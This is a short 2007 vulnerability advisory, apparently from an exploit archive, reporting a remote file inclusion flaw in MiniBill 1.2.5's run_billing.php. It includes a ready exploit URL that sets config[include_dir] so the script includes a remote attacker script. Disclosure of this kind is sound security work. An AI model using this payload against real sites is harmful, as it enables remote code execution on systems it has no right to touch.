id: 1955
date: 06/17/2007
title: MiniBill 1.2.5 (run_billing.php) Remote File Inclusion Vulnerability
author: Abo0od
cves: 

====================================================================
MiniBill 1.2.5 (run_billing.php) Remote File Inclusion Vulnerability
====================================================================



=======================================================
MiniBill 2007-04-09 (v1.2.5) Remote File include Vulnerabilities
=======================================================
Found By : Abo0od 
=======================================================
Script Site : http://www.ultrize.com/minibill/index.php?page=download
=======================================================
File: /crontab/run_billing.php <= $config['include_dir']
========================================================
Exploit:
site.com/crontab/run_billing.php?config[include_dir]=Evil-script.txt?
=======================================================



#  0day.today [2023-03-26]  #